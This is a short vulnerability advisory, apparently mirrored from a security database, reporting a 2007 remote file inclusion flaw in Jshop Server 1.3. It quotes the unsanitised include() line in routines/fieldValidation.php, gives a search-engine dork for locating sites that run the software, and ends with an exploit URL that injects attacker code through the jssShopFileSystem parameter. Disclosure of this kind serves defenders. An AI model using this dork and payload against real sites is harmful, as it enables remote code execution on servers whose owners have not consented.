Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15680
HistoryJan 11, 2007 - 12:00 a.m.

Jshop Server 1.3

2007-01-1100:00:00
vulners.com
46

==========================================================================

scripts : Jshop Server 1.3

Discovered By : irvian

script : http://www.jshop.co.uk/

Thanks To : #hitamputih #nyubicrew #patihack

special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz

dork : powered by Jshop


file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");

exploit : http://www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]